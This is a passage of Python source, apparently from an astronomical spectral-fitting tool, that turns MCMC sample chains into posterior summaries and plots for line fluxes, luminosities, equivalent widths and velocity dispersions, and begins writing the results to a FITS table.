if ~np.isfinite(post_max) or ~np.isfinite(low_68) or ~np.isfinite(upp_68):
flag += 1
ll_dict = {
'par_best' : post_max, # maximum of posterior distribution
'ci_68_low' : low_68, # lower 68% confidence interval
'ci_68_upp' : upp_68, # upper 68% confidence interval
'ci_95_low' : low_95, # lower 95% confidence interval
'ci_95_upp' : upp_95, # upper 95% confidence interval
'mean' : post_mean, # mean of posterior distribution
'std_dev' : post_std, # standard deviation
'median' : post_med, # median of posterior distribution
'med_abs_dev' : post_mad, # median absolute deviation
'flat_chain' : flat, # flattened samples used for histogram.
'flag' : flag,
}
if (plot_param_hist==True):
posterior_plots("LOG_LIKE",flat,ll,burn_in,xs,kde,h,
post_max,low_68,upp_68,low_95,upp_95,post_mean,post_std,post_med,post_mad,
run_dir)
else:
ll_dict = {
'par_best' : np.nan, # maximum of posterior distribution
'ci_68_low' : np.nan, # lower 68% confidence interval
'ci_68_upp' : np.nan, # upper 68% confidence interval
'ci_95_low' : np.nan, # lower 95% confidence interval
'ci_95_upp' : np.nan, # upper 95% confidence interval
'mean' : np.nan, # mean of posterior distribution
'std_dev' : np.nan, # standard deviation
'median' : np.nan, # median of posterior distribution
'med_abs_dev' : np.nan, # median absolute deviation
'flat_chain' : flat, # flattened samples used for histogram.
'flag' : 1,
}
return ll_dict
def flux_plots(flux_blob, burn_in, nwalkers, run_dir, plot_flux_hist=True,verbose=True):
"""
Generates best-fit values, uncertainties, and plots for
component fluxes from MCMC sample chains.
"""
if verbose:
print("\n Generating model flux distributions...\n")
# Create a flux dictionary
niter = np.shape(flux_blob)[0]
nwalkers = np.shape(flux_blob)[1]
flux_dict = {}
for key in flux_blob[0][0]:
flux_dict[key] = {'chain':np.empty([nwalkers,niter])}
# Restructure the flux_blob for the flux_dict
for i in range(niter):
for j in range(nwalkers):
for key in flux_blob[0][0]:
flux_dict[key]['chain'][j,i] = flux_blob[i][j][key]
for key in flux_dict:
if verbose:
print(' %s' % key)
chain = np.log10(flux_dict[key]['chain']*1.e-17) # shape = (nwalkers,niter)
chain[~np.isfinite(chain)] = 0
flux_dict[key]['chain'] = chain
# Burned-in + Flattened (along walker axis) chain
# If burn_in is larger than the size of the chain, then
# take 50% of the chain length instead.
if (burn_in >= np.shape(chain)[1]):
burn_in = int(0.5*np.shape(chain)[1])
# Remove burn_in iterations and flatten for histogram
flat = chain[:,burn_in:]
flat = flat.flat
# Subsample the data into a manageable size for the kde and HDI
if len(flat) > 0:
subsampled = np.random.choice(flat,size=10000)
# Histogram; 'Doane' binning produces the best results from tests.
hist, bin_edges = np.histogram(subsampled, bins='doane', density=False)
# Generate pseudo-data on the ends of the histogram; this prevents the KDE
# from weird edge behavior.
n_pseudo = 3 # number of pseudo-bins
bin_width=bin_edges[1]-bin_edges[0]
lower_pseudo_data = np.random.uniform(low=bin_edges[0]-bin_width*n_pseudo, high=bin_edges[0], size=hist[0]*n_pseudo)
upper_pseudo_data = np.random.uniform(low=bin_edges[-1], high=bin_edges[-1]+bin_width*n_pseudo, size=hist[-1]*n_pseudo)
# Calculate bandwidth for KDE (Silverman method)
h = kde_bandwidth(flat)
# Create a subsampled grid for the KDE based on the subsampled data; by
# default, we subsample by a factor of 10.
xs = np.linspace(np.min(subsampled),np.max(subsampled),10*len(hist))
# Calculate KDE
kde = gauss_kde(xs,np.concatenate([subsampled,lower_pseudo_data,upper_pseudo_data]),h)
p68 = compute_HDI(subsampled,0.68)
p95 = compute_HDI(subsampled,0.95)
post_max = xs[kde.argmax()] # posterior max estimated from KDE
post_mean = np.mean(flat)
post_med = np.median(flat)
low_68 = post_max - p68[0]
upp_68 = p68[1] - post_max
low_95 = post_max - p95[0]
upp_95 = p95[1] - post_max
post_std = np.std(flat)
post_mad = stats.median_abs_deviation(flat)
# Quality flags; flag any parameter that violates parameter limits by 1.5 sigma
flag = 0
if ( (post_max-1.5*low_68) <= -20 ):
flag+=1
if ~np.isfinite(post_max) or ~np.isfinite(low_68) or ~np.isfinite(upp_68):
flag+=1
flux_dict[key]['par_best'] = post_max # maximum of posterior distribution
flux_dict[key]['ci_68_low'] = low_68 # lower 68% confidence interval
flux_dict[key]['ci_68_upp'] = upp_68 # upper 68% confidence interval
flux_dict[key]['ci_95_low'] = low_95 # lower 95% confidence interval
flux_dict[key]['ci_95_upp'] = upp_95 # upper 95% confidence interval
flux_dict[key]['mean'] = post_mean # mean of posterior distribution
flux_dict[key]['std_dev'] = post_std # standard deviation
flux_dict[key]['median'] = post_med # median of posterior distribution
flux_dict[key]['med_abs_dev'] = post_mad # median absolute deviation
flux_dict[key]['flat_chain'] = flat # flattened samples used for histogram.
flux_dict[key]['flag'] = flag
if (plot_flux_hist==True):
posterior_plots(key,flat,chain,burn_in,xs,kde,h,
post_max,low_68,upp_68,low_95,upp_95,post_mean,post_std,post_med,post_mad,
run_dir)
else:
flux_dict[key]['par_best'] = np.nan # maximum of posterior distribution
flux_dict[key]['ci_68_low'] = np.nan # lower 68% confidence interval
flux_dict[key]['ci_68_upp'] = np.nan # upper 68% confidence interval
flux_dict[key]['ci_95_low'] = np.nan # lower 95% confidence interval
flux_dict[key]['ci_95_upp'] = np.nan # upper 95% confidence interval
flux_dict[key]['mean'] = np.nan # mean of posterior distribution
flux_dict[key]['std_dev'] = np.nan # standard deviation
flux_dict[key]['median'] = np.nan # median of posterior distribution
flux_dict[key]['med_abs_dev'] = np.nan # median absolute deviation
flux_dict[key]['flat_chain'] = flat # flattened samples used for histogram.
flux_dict[key]['flag'] = 1
return flux_dict
def lum_plots(flux_dict,burn_in,nwalkers,z,run_dir,H0=70.0,Om0=0.30,plot_lum_hist=True,verbose=True):
"""
Generates best-fit values, uncertainties, and plots for
component luminosities from MCMC sample chains.
"""
if verbose:
print("\n Generating model luminosity distributions...\n")
# Compute luminosity distance (in cm) using FlatLambdaCDM cosmology
cosmo = FlatLambdaCDM(H0, Om0)
d_mpc = cosmo.luminosity_distance(z).value
d_cm = d_mpc * 3.086E+24 # 1 Mpc = 3.086e+24 cm
# Create a flux dictionary
lum_dict = {}
for key in flux_dict:
flux = 10**(flux_dict[key]['chain']) # * 1.e-17
# Convert fluxes to luminosities and take log10
lum = np.log10((flux * 4*np.pi * d_cm**2 )) #/ 1.0E+42
lum[~np.isfinite(lum)] = 0
lum_dict[key[:-4]+'LUM']= {'chain':lum}
for key in lum_dict:
if verbose:
print(' %s' % key)
chain = lum_dict[key]['chain'] # shape = (nwalkers,niter)
chain[~np.isfinite(chain)] = 0
# Burned-in + Flattened (along walker axis) chain
# If burn_in is larger than the size of the chain, then
# take 50% of the chain length instead.
if (burn_in >= np.shape(chain)[1]):
burn_in = int(0.5*np.shape(chain)[1])
# print('\n Burn-in is larger than chain length! Using 50% of chain length for burn-in...\n')
# Remove burn_in iterations and flatten for histogram
flat = chain[:,burn_in:]
flat = flat.flat
# Subsample the data into a manageable size for the kde and HDI
if len(flat) > 0:
subsampled = np.random.choice(flat,size=10000)
# Histogram; 'Doane' binning produces the best results from tests.
hist, bin_edges = np.histogram(subsampled, bins='doane', density=False)
# Generate pseudo-data on the ends of the histogram; this prevents the KDE
# from weird edge behavior.
n_pseudo = 3 # number of pseudo-bins
bin_width=bin_edges[1]-bin_edges[0]
lower_pseudo_data = np.random.uniform(low=bin_edges[0]-bin_width*n_pseudo, high=bin_edges[0], size=hist[0]*n_pseudo)
upper_pseudo_data = np.random.uniform(low=bin_edges[-1], high=bin_edges[-1]+bin_width*n_pseudo, size=hist[-1]*n_pseudo)
# Calculate bandwidth for KDE (Silverman method)
h = kde_bandwidth(flat)
# Create a subsampled grid for the KDE based on the subsampled data; by
# default, we subsample by a factor of 10.
xs = np.linspace(np.min(subsampled),np.max(subsampled),10*len(hist))
# Calculate KDE
kde = gauss_kde(xs,np.concatenate([subsampled,lower_pseudo_data,upper_pseudo_data]),h)
p68 = compute_HDI(subsampled,0.68)
p95 = compute_HDI(subsampled,0.95)
post_max = xs[kde.argmax()] # posterior max estimated from KDE
post_mean = np.mean(flat)
post_med = np.median(flat)
low_68 = post_max - p68[0]
upp_68 = p68[1] - post_max
low_95 = post_max - p95[0]
upp_95 = p95[1] - post_max
post_std = np.std(flat)
post_mad = stats.median_abs_deviation(flat)
# Quality flags; flag any parameter that violates parameter limits by 1.5 sigma
flag = 0
if ( (post_max-1.5*low_68) <= 30 ):
flag+=1
if ~np.isfinite(post_max) or ~np.isfinite(low_68) or ~np.isfinite(upp_68):
flag+=1
lum_dict[key]['par_best'] = post_max # maximum of posterior distribution
lum_dict[key]['ci_68_low'] = low_68 # lower 68% confidence interval
lum_dict[key]['ci_68_upp'] = upp_68 # upper 68% confidence interval
lum_dict[key]['ci_95_low'] = low_95 # lower 95% confidence interval
lum_dict[key]['ci_95_upp'] = upp_95 # upper 95% confidence interval
lum_dict[key]['mean'] = post_mean # mean of posterior distribution
lum_dict[key]['std_dev'] = post_std # standard deviation
lum_dict[key]['median'] = post_med # median of posterior distribution
lum_dict[key]['med_abs_dev'] = post_mad # median absolute deviation
lum_dict[key]['flat_chain'] = flat # flattened samples used for histogram.
lum_dict[key]['flag'] = flag
if (plot_lum_hist==True):
posterior_plots(key,flat,chain,burn_in,xs,kde,h,
post_max,low_68,upp_68,low_95,upp_95,post_mean,post_std,post_med,post_mad,
run_dir)
else:
lum_dict[key]['par_best'] = np.nan # maximum of posterior distribution
lum_dict[key]['ci_68_low'] = np.nan # lower 68% confidence interval
lum_dict[key]['ci_68_upp'] = np.nan # upper 68% confidence interval
lum_dict[key]['ci_95_low'] = np.nan # lower 95% confidence interval
lum_dict[key]['ci_95_upp'] = np.nan # upper 95% confidence interval
lum_dict[key]['mean'] = np.nan # mean of posterior distribution
lum_dict[key]['std_dev'] = np.nan # standard deviation
lum_dict[key]['median'] = np.nan # median of posterior distribution
lum_dict[key]['med_abs_dev'] = np.nan # median absolute deviation
lum_dict[key]['flat_chain'] = flat # flattened samples used for histogram.
lum_dict[key]['flag'] = 1
return lum_dict
def eqwidth_plots(eqwidth_blob, burn_in, nwalkers, run_dir, plot_eqwidth_hist=True,verbose=True):
"""
Generates best-fit values, uncertainties, and plots for
component fluxes from MCMC sample chains.
"""
if verbose:
print("\n Generating model equivalent width distributions...\n")
# Create a flux dictionary
niter = np.shape(eqwidth_blob)[0]
nwalkers = np.shape(eqwidth_blob)[1]
eqwidth_dict = {}
for key in eqwidth_blob[0][0]:
eqwidth_dict[key] = {'chain':np.empty([nwalkers,niter])}
# Restructure the flux_blob for the flux_dict
for i in range(niter):
for j in range(nwalkers):
for key in eqwidth_blob[0][0]:
eqwidth_dict[key]['chain'][j,i] = eqwidth_blob[i][j][key]
for key in eqwidth_dict:
if verbose:
print(' %s' % key)
chain = eqwidth_dict[key]['chain'] # shape = (nwalkers,niter)
chain[~np.isfinite(chain)] = 0
# Burned-in + Flattened (along walker axis) chain
# If burn_in is larger than the size of the chain, then
# take 50% of the chain length instead.
if (burn_in >= np.shape(chain)[1]):
burn_in = int(0.5*np.shape(chain)[1])
# Remove burn_in iterations and flatten for histogram
flat = chain[:,burn_in:]
flat = flat.flat
# Subsample the data into a manageable size for the kde and HDI
if len(flat) > 0:
subsampled = np.random.choice(flat,size=10000)
# Histogram; 'Doane' binning produces the best results from tests.
hist, bin_edges = np.histogram(subsampled, bins='doane', density=False)
# Generate pseudo-data on the ends of the histogram; this prevents the KDE
# from weird edge behavior.
n_pseudo = 3 # number of pseudo-bins
bin_width=bin_edges[1]-bin_edges[0]
lower_pseudo_data = np.random.uniform(low=bin_edges[0]-bin_width*n_pseudo, high=bin_edges[0], size=hist[0]*n_pseudo)
upper_pseudo_data = np.random.uniform(low=bin_edges[-1], high=bin_edges[-1]+bin_width*n_pseudo, size=hist[-1]*n_pseudo)
# Calculate bandwidth for KDE (Silverman method)
h = kde_bandwidth(flat)
# Create a subsampled grid for the KDE based on the subsampled data; by
# default, we subsample by a factor of 10.
xs = np.linspace(np.min(subsampled),np.max(subsampled),10*len(hist))
# Calculate KDE
kde = gauss_kde(xs,np.concatenate([subsampled,lower_pseudo_data,upper_pseudo_data]),h)
p68 = compute_HDI(subsampled,0.68)
p95 = compute_HDI(subsampled,0.95)
post_max = xs[kde.argmax()] # posterior max estimated from KDE
post_mean = np.mean(flat)
post_med = np.median(flat)
low_68 = post_max - p68[0]
upp_68 = p68[1] - post_max
low_95 = post_max - p95[0]
upp_95 = p95[1] - post_max
post_std = np.std(flat)
post_mad = stats.median_abs_deviation(flat)
# Quality flags; flag any parameter that violates parameter limits by 1.5 sigma
flag = 0
if ( (post_max-1.5*low_68) <= 0 ):
flag+=1
if ~np.isfinite(post_max) or ~np.isfinite(low_68) or ~np.isfinite(upp_68):
flag+=1
eqwidth_dict[key]['par_best'] = post_max # maximum of posterior distribution
eqwidth_dict[key]['ci_68_low'] = low_68 # lower 68% confidence interval
eqwidth_dict[key]['ci_68_upp'] = upp_68 # upper 68% confidence interval
eqwidth_dict[key]['ci_95_low'] = low_95 # lower 95% confidence interval
eqwidth_dict[key]['ci_95_upp'] = upp_95 # upper 95% confidence interval
eqwidth_dict[key]['mean'] = post_mean # mean of posterior distribution
eqwidth_dict[key]['std_dev'] = post_std # standard deviation
eqwidth_dict[key]['median'] = post_med # median of posterior distribution
eqwidth_dict[key]['med_abs_dev'] = post_mad # median absolute deviation
eqwidth_dict[key]['flat_chain'] = flat # flattened samples used for histogram.
eqwidth_dict[key]['flag'] = flag
if (plot_eqwidth_hist==True):
posterior_plots(key,flat,chain,burn_in,xs,kde,h,
post_max,low_68,upp_68,low_95,upp_95,post_mean,post_std,post_med,post_mad,
run_dir)
else:
eqwidth_dict[key]['par_best'] = np.nan # maximum of posterior distribution
eqwidth_dict[key]['ci_68_low'] = np.nan # lower 68% confidence interval
eqwidth_dict[key]['ci_68_upp'] = np.nan # upper 68% confidence interval
eqwidth_dict[key]['ci_95_low'] = np.nan # lower 95% confidence interval
eqwidth_dict[key]['ci_95_upp'] = np.nan # upper 95% confidence interval
eqwidth_dict[key]['mean'] = np.nan # mean of posterior distribution
eqwidth_dict[key]['std_dev'] = np.nan # standard deviation
eqwidth_dict[key]['median'] = np.nan # median of posterior distribution
eqwidth_dict[key]['med_abs_dev'] = np.nan # median absolute deviation
eqwidth_dict[key]['flat_chain'] = flat # flattened samples used for histogram.
eqwidth_dict[key]['flag'] = 1
return eqwidth_dict
def cont_lum_plots(cont_flux_blob,burn_in,nwalkers,z,run_dir,H0=70.0,Om0=0.30,plot_lum_hist=True,verbose=True):
"""
Generates best-fit values, uncertainties, and plots for
component luminosities from MCMC sample chains.
"""
# Create a flux dictionary
niter = np.shape(cont_flux_blob)[0]
nwalkers = np.shape(cont_flux_blob)[1]
cont_flux_dict = {}
for key in cont_flux_blob[0][0]:
cont_flux_dict[key] = {'chain':np.empty([nwalkers,niter])}
# Restructure the flux_blob for the flux_dict
for i in range(niter):
for j in range(nwalkers):
for key in cont_flux_blob[0][0]:
cont_flux_dict[key]['chain'][j,i] = cont_flux_blob[i][j][key]
# Compute luminosity distance (in cm) using FlatLambdaCDM cosmology
cosmo = FlatLambdaCDM(H0, Om0)
d_mpc = cosmo.luminosity_distance(z).value
d_cm = d_mpc * 3.086E+24 # 1 Mpc = 3.086e+24 cm
# Create a luminosity dictionary
cont_lum_dict = {}
for key in cont_flux_dict:
# Total cont. lum.
if (key=="F_CONT_TOT_1350"):
flux = (cont_flux_dict[key]['chain']) * 1.0E-17
# Convert fluxes to luminosities and normalize by 10^(+42) to avoid numerical issues
lum = np.log10((flux * 4*np.pi * d_cm**2 ) * 1350.0) #/ 1.0E+42
lum[~np.isfinite(lum)] = 0
cont_lum_dict["L_CONT_TOT_1350"]= {'chain':lum}
if (key=="F_CONT_TOT_3000"):
flux = (cont_flux_dict[key]['chain']) * 1.0E-17
# Convert fluxes to luminosities and normalize by 10^(+42) to avoid numerical issues
lum = np.log10((flux * 4*np.pi * d_cm**2 ) * 3000.0) #/ 1.0E+42
lum[~np.isfinite(lum)] = 0
cont_lum_dict["L_CONT_TOT_3000"]= {'chain':lum}
if (key=="F_CONT_TOT_5100"):
flux = (cont_flux_dict[key]['chain']) * 1.0E-17
# Convert fluxes to luminosities and normalize by 10^(+42) to avoid numerical issues
lum = np.log10((flux * 4*np.pi * d_cm**2 ) * 5100.0) #/ 1.0E+42
lum[~np.isfinite(lum)] = 0
cont_lum_dict["L_CONT_TOT_5100"]= {'chain':lum}
# AGN cont. lum.
if (key=="F_CONT_AGN_1350"):
flux = (cont_flux_dict[key]['chain']) * 1.0E-17
# Convert fluxes to luminosities and normalize by 10^(+42) to avoid numerical issues
lum = np.log10((flux * 4*np.pi * d_cm**2 ) * 1350.0) #/ 1.0E+42
lum[~np.isfinite(lum)] = 0
cont_lum_dict["L_CONT_AGN_1350"]= {'chain':lum}
if (key=="F_CONT_AGN_3000"):
flux = (cont_flux_dict[key]['chain']) * 1.0E-17
# Convert fluxes to luminosities and normalize by 10^(+42) to avoid numerical issues
lum = np.log10((flux * 4*np.pi * d_cm**2 ) * 3000.0) #/ 1.0E+42
lum[~np.isfinite(lum)] = 0
cont_lum_dict["L_CONT_AGN_3000"]= {'chain':lum}
if (key=="F_CONT_AGN_5100"):
flux = (cont_flux_dict[key]['chain']) * 1.0E-17
# Convert fluxes to luminosities and normalize by 10^(+42) to avoid numerical issues
lum = np.log10((flux * 4*np.pi * d_cm**2 ) * 5100.0) #/ 1.0E+42
lum[~np.isfinite(lum)] = 0
cont_lum_dict["L_CONT_AGN_5100"]= {'chain':lum}
# Host cont. lum
if (key=="F_CONT_HOST_1350"):
flux = (cont_flux_dict[key]['chain']) * 1.0E-17
# Convert fluxes to luminosities and normalize by 10^(+42) to avoid numerical issues
lum = np.log10((flux * 4*np.pi * d_cm**2 ) * 1350.0) #/ 1.0E+42
lum[~np.isfinite(lum)] = 0
cont_lum_dict["L_CONT_HOST_1350"]= {'chain':lum}
if (key=="F_CONT_HOST_3000"):
flux = (cont_flux_dict[key]['chain']) * 1.0E-17
# Convert fluxes to luminosities and normalize by 10^(+42) to avoid numerical issues
lum = np.log10((flux * 4*np.pi * d_cm**2 ) * 3000.0) #/ 1.0E+42
lum[~np.isfinite(lum)] = 0
cont_lum_dict["L_CONT_HOST_3000"]= {'chain':lum}
if (key=="F_CONT_HOST_5100"):
flux = (cont_flux_dict[key]['chain']) * 1.0E-17
# Convert fluxes to luminosities and normalize by 10^(+42) to avoid numerical issues
lum = np.log10((flux * 4*np.pi * d_cm**2 ) * 5100.0) #/ 1.0E+42
lum[~np.isfinite(lum)] = 0
cont_lum_dict["L_CONT_HOST_5100"]= {'chain':lum}
# AGN fractions
if (key=="AGN_FRAC_4000"):
cont_lum_dict["AGN_FRAC_4000"]= {'chain':cont_flux_dict[key]['chain']}
if (key=="AGN_FRAC_7000"):
cont_lum_dict["AGN_FRAC_7000"]= {'chain':cont_flux_dict[key]['chain']}
# Host fractions
if (key=="HOST_FRAC_4000"):
cont_lum_dict["HOST_FRAC_4000"]= {'chain':cont_flux_dict[key]['chain']}
if (key=="HOST_FRAC_7000"):
cont_lum_dict["HOST_FRAC_7000"]= {'chain':cont_flux_dict[key]['chain']}
for key in cont_lum_dict:
if verbose:
print(' %s' % key)
chain = cont_lum_dict[key]['chain'] # shape = (nwalkers,niter)
chain[~np.isfinite(chain)] = 0
# Burned-in + Flattened (along walker axis) chain
# If burn_in is larger than the size of the chain, then
# take 50% of the chain length instead.
if (burn_in >= np.shape(chain)[1]):
burn_in = int(0.5*np.shape(chain)[1])
# print('\n Burn-in is larger than chain length! Using 50% of chain length for burn-in...\n')
# Remove burn_in iterations and flatten for histogram
flat = chain[:,burn_in:]
flat = flat.flat
# Subsample the data into a manageable size for the kde and HDI
if len(flat) > 0:
subsampled = np.random.choice(flat,size=10000)
# Histogram; 'Doane' binning produces the best results from tests.
hist, bin_edges = np.histogram(subsampled, bins='doane', density=False)
# Generate pseudo-data on the ends of the histogram; this prevents the KDE
# from weird edge behavior.
n_pseudo = 3 # number of pseudo-bins
bin_width=bin_edges[1]-bin_edges[0]
lower_pseudo_data = np.random.uniform(low=bin_edges[0]-bin_width*n_pseudo, high=bin_edges[0], size=hist[0]*n_pseudo)
upper_pseudo_data = np.random.uniform(low=bin_edges[-1], high=bin_edges[-1]+bin_width*n_pseudo, size=hist[-1]*n_pseudo)
# Calculate bandwidth for KDE (Silverman method)
h = kde_bandwidth(flat)
# Create a subsampled grid for the KDE based on the subsampled data; by
# default, we subsample by a factor of 10.
xs = np.linspace(np.min(subsampled),np.max(subsampled),10*len(hist))
# Calculate KDE
kde = gauss_kde(xs,np.concatenate([subsampled,lower_pseudo_data,upper_pseudo_data]),h)
p68 = compute_HDI(subsampled,0.68)
p95 = compute_HDI(subsampled,0.95)
post_max = xs[kde.argmax()] # posterior max estimated from KDE
post_mean = np.mean(flat)
post_med = np.median(flat)
low_68 = post_max - p68[0]
upp_68 = p68[1] - post_max
low_95 = post_max - p95[0]
upp_95 = p95[1] - post_max
post_std = np.std(flat)
post_mad = stats.median_abs_deviation(flat)
# Quality flags; flag any parameter that violates parameter limits by 1.5 sigma
flag = 0
if ( (post_max-1.5*low_68) <= 0 ):
flag+=1
if ~np.isfinite(post_max) or ~np.isfinite(low_68) or ~np.isfinite(upp_68):
flag+=1
cont_lum_dict[key]['par_best'] = post_max # maximum of posterior distribution
cont_lum_dict[key]['ci_68_low'] = low_68 # lower 68% confidence interval
cont_lum_dict[key]['ci_68_upp'] = upp_68 # upper 68% confidence interval
cont_lum_dict[key]['ci_95_low'] = low_95 # lower 95% confidence interval
cont_lum_dict[key]['ci_95_upp'] = upp_95 # upper 95% confidence interval
cont_lum_dict[key]['mean'] = post_mean # mean of posterior distribution
cont_lum_dict[key]['std_dev'] = post_std # standard deviation
cont_lum_dict[key]['median'] = post_med # median of posterior distribution
cont_lum_dict[key]['med_abs_dev'] = post_mad # median absolute deviation
cont_lum_dict[key]['flat_chain'] = flat # flattened samples used for histogram.
cont_lum_dict[key]['flag'] = flag
if (plot_lum_hist==True):
posterior_plots(key,flat,chain,burn_in,xs,kde,h,
post_max,low_68,upp_68,low_95,upp_95,post_mean,post_std,post_med,post_mad,
run_dir)
else:
cont_lum_dict[key]['par_best'] = np.nan # maximum of posterior distribution
cont_lum_dict[key]['ci_68_low'] = np.nan # lower 68% confidence interval
cont_lum_dict[key]['ci_68_upp'] = np.nan # upper 68% confidence interval
cont_lum_dict[key]['ci_95_low'] = np.nan # lower 95% confidence interval
cont_lum_dict[key]['ci_95_upp'] = np.nan # upper 95% confidence interval
cont_lum_dict[key]['mean'] = np.nan # mean of posterior distribution
cont_lum_dict[key]['std_dev'] = np.nan # standard deviation
cont_lum_dict[key]['median'] = np.nan # median of posterior distribution
cont_lum_dict[key]['med_abs_dev'] = np.nan # median absolute deviation
cont_lum_dict[key]['flat_chain'] = flat # flattened samples used for histogram.
cont_lum_dict[key]['flag'] = 1
return cont_lum_dict
def int_vel_disp_plots(int_vel_disp_blob,burn_in,nwalkers,z,run_dir,H0=70.0,Om0=0.30,plot_param_hist=True,verbose=True):
"""
Generates best-fit values, uncertainties, and plots for
component luminosities from MCMC sample chains.
"""
if verbose:
print("\n Generating model integrated velocity moment distributions...\n")
# Create a flux dictionary
niter = np.shape(int_vel_disp_blob)[0]
nwalkers = np.shape(int_vel_disp_blob)[1]
int_vel_disp_dict = {}
for key in int_vel_disp_blob[0][0]:
int_vel_disp_dict[key] = {'chain':np.empty([nwalkers,niter])}
# Restructure the int_vel_disp_blob for the int_vel_disp_dict
for i in range(niter):
for j in range(nwalkers):
for key in int_vel_disp_blob[0][0]:
int_vel_disp_dict[key]['chain'][j,i] = int_vel_disp_blob[i][j][key]
for key in int_vel_disp_dict:
if verbose:
print(' %s' % key)
chain = int_vel_disp_dict[key]['chain'] # shape = (nwalkers,niter)
chain[~np.isfinite(chain)] = 0
# Burned-in + Flattened (along walker axis) chain
# If burn_in is larger than the size of the chain, then
# take 50% of the chain length instead.
if (burn_in >= np.shape(chain)[1]):
burn_in = int(0.5*np.shape(chain)[1])
# print('\n Burn-in is larger than chain length! Using 50% of chain length for burn-in...\n')
# Remove burn_in iterations and flatten for histogram
flat = chain[:,burn_in:]
flat = flat.flat
# Subsample the data into a manageable size for the kde and HDI
if len(flat) > 0:
subsampled = np.random.choice(flat,size=10000)
# Histogram; 'Doane' binning produces the best results from tests.
hist, bin_edges = np.histogram(subsampled, bins='doane', density=False)
# Generate pseudo-data on the ends of the histogram; this prevents the KDE
# from weird edge behavior.
n_pseudo = 3 # number of pseudo-bins
bin_width=bin_edges[1]-bin_edges[0]
lower_pseudo_data = np.random.uniform(low=bin_edges[0]-bin_width*n_pseudo, high=bin_edges[0], size=hist[0]*n_pseudo)
upper_pseudo_data = np.random.uniform(low=bin_edges[-1], high=bin_edges[-1]+bin_width*n_pseudo, size=hist[-1]*n_pseudo)
# Calculate bandwidth for KDE (Silverman method)
h = kde_bandwidth(flat)
# Create a subsampled grid for the KDE based on the subsampled data; by
# default, we subsample by a factor of 10.
xs = np.linspace(np.min(subsampled),np.max(subsampled),10*len(hist))
# Calculate KDE
kde = gauss_kde(xs,np.concatenate([subsampled,lower_pseudo_data,upper_pseudo_data]),h)
p68 = compute_HDI(subsampled,0.68)
p95 = compute_HDI(subsampled,0.95)
post_max = xs[kde.argmax()] # posterior max estimated from KDE
post_mean = np.mean(flat)
post_med = np.median(flat)
low_68 = post_max - p68[0]
upp_68 = p68[1] - post_max
low_95 = post_max - p95[0]
upp_95 = p95[1] - post_max
post_std = np.std(flat)
post_mad = stats.median_abs_deviation(flat)
# Quality flags; flag any parameter that violates parameter limits by 1.5 sigma
flag = 0
if ( (post_max-1.5*low_68) <= 0 ):
flag+=1
if ~np.isfinite(post_max) or ~np.isfinite(low_68) or ~np.isfinite(upp_68):
flag+=1
int_vel_disp_dict[key]['par_best'] = post_max # maximum of posterior distribution
int_vel_disp_dict[key]['ci_68_low'] = low_68 # lower 68% confidence interval
int_vel_disp_dict[key]['ci_68_upp'] = upp_68 # upper 68% confidence interval
int_vel_disp_dict[key]['ci_95_low'] = low_95 # lower 95% confidence interval
int_vel_disp_dict[key]['ci_95_upp'] = upp_95 # upper 95% confidence interval
int_vel_disp_dict[key]['mean'] = post_mean # mean of posterior distribution
int_vel_disp_dict[key]['std_dev'] = post_std # standard deviation
int_vel_disp_dict[key]['median'] = post_med # median of posterior distribution
int_vel_disp_dict[key]['med_abs_dev'] = post_mad # median absolute deviation
int_vel_disp_dict[key]['flat_chain'] = flat # flattened samples used for histogram.
int_vel_disp_dict[key]['flag'] = flag
if (plot_param_hist==True):
posterior_plots(key,flat,chain,burn_in,xs,kde,h,
post_max,low_68,upp_68,low_95,upp_95,post_mean,post_std,post_med,post_mad,
run_dir)
else:
int_vel_disp_dict[key]['par_best'] = np.nan # maximum of posterior distribution
int_vel_disp_dict[key]['ci_68_low'] = np.nan # lower 68% confidence interval
int_vel_disp_dict[key]['ci_68_upp'] = np.nan # upper 68% confidence interval
int_vel_disp_dict[key]['ci_95_low'] = np.nan # lower 95% confidence interval
int_vel_disp_dict[key]['ci_95_upp'] = np.nan # upper 95% confidence interval
int_vel_disp_dict[key]['mean'] = np.nan # mean of posterior distribution
int_vel_disp_dict[key]['std_dev'] = np.nan # standard deviation
int_vel_disp_dict[key]['median'] = np.nan # median of posterior distribution
int_vel_disp_dict[key]['med_abs_dev'] = np.nan # median absolute deviation
int_vel_disp_dict[key]['flat_chain'] = flat # flattened samples used for histogram.
int_vel_disp_dict[key]['flag'] = 1
return int_vel_disp_dict
# def write_params(param_dict,flux_dict,lum_dict,eqwidth_dict,cont_lum_dict,int_vel_disp_dict,extra_dict,header_dict,bounds,run_dir,
# binnum=None,spaxelx=None,spaxely=None):
def write_params(param_dict,header_dict,bounds,run_dir,binnum=None,spaxelx=None,spaxely=None):
"""
Writes all measured parameters, fluxes, luminosities, and extra stuff
(black hole mass, systemic redshifts) and all flags to a FITS table.
"""
# Extract elements from dictionaries
par_names = []
par_best = []
ci_68_low = []
ci_68_upp = []
ci_95_low = []
ci_95_upp = []
mean = []
std_dev = []
median = []
med_abs_dev = []
flags = []
# Param dict
for key in param_dict:
par_names.append(key)
par_best.append(param_dict[key]['par_best'])
ci_68_low.append(param_dict[key]['ci_68_low'])
ci_68_upp.append(param_dict[key]['ci_68_upp'])
ci_95_low.append(param_dict[key]['ci_95_low'])
ci_95_upp.append(param_dict[key]['ci_95_upp'])
mean.append(param_dict[key]['mean'])
std_dev.append(param_dict[key]['std_dev'])
median.append(param_dict[key]['median'])
med_abs_dev.append(param_dict[key]['med_abs_dev'])
flags.append(param_dict[key]['flag'])
# Sort param_names alphabetically
i_sort = np.argsort(par_names)
par_names = np.array(par_names)[i_sort]
par_best = np.array(par_best)[i_sort]
ci_68_low = np.array(ci_68_low)[i_sort]
ci_68_upp = np.array(ci_68_upp)[i_sort]
ci_95_low = np.array(ci_95_low)[i_sort]
ci_95_upp = np.array(ci_95_upp)[i_sort]
mean = np.array(mean)[i_sort]
std_dev = np.array(std_dev)[i_sort]
median = np.array(median)[i_sort]
med_abs_dev = np.array(med_abs_dev)[i_sort]
flags = np.array(flags)[i_sort]
# Write best-fit parameters to FITS table
col1 = fits.Column(name='parameter', format='30A', array=par_names)
col2 = fits.Column(name='best_fit', format='E', array=par_best)
col3 = fits.Column(name='ci_68_low', format='E', array=ci_68_low)
col4 = fits.Column(name='ci_68_upp', format='E', array=ci_68_upp)
col5 = fits.Column(name='ci_95_low', format='E', array=ci_95_low)
col6 = fits.Column(name='ci_95_upp', format='E', array=ci_95_upp)
col7 = fits.Column(name='mean', format='E', array=mean)
col8 = fits.Column(name='std_dev', format='E', array=std_dev)
